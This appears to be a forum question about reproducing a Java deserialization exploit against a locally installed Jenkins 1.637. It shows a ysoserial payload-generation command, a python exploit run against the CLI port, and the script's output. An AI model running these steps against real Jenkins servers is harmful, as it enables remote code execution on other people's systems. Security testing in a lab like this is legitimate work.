I download the deb package of Jenkins version 1.637 and install it on my Kali Linux. Then I start the jenkins service and check the status of Jenkins.
I run the following exploit locally:
Step One:
Use the tool ysoserial to create the payload.
# java -jar ysoserial-0.0.4-all.jar CommonsCollections1 'touch /tmp/pwned' > payload
Step Two:
# python jenkins.py localhost 8080 ../../payload
connecting to localhost port 39968
sending "Protocol:CLI-connect"
received "Welcome
"
received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
sending payload...
Then check for the existence of /tmp/pwned.
But sadly, I don't see this file. Is there any problem with how I do my exploit?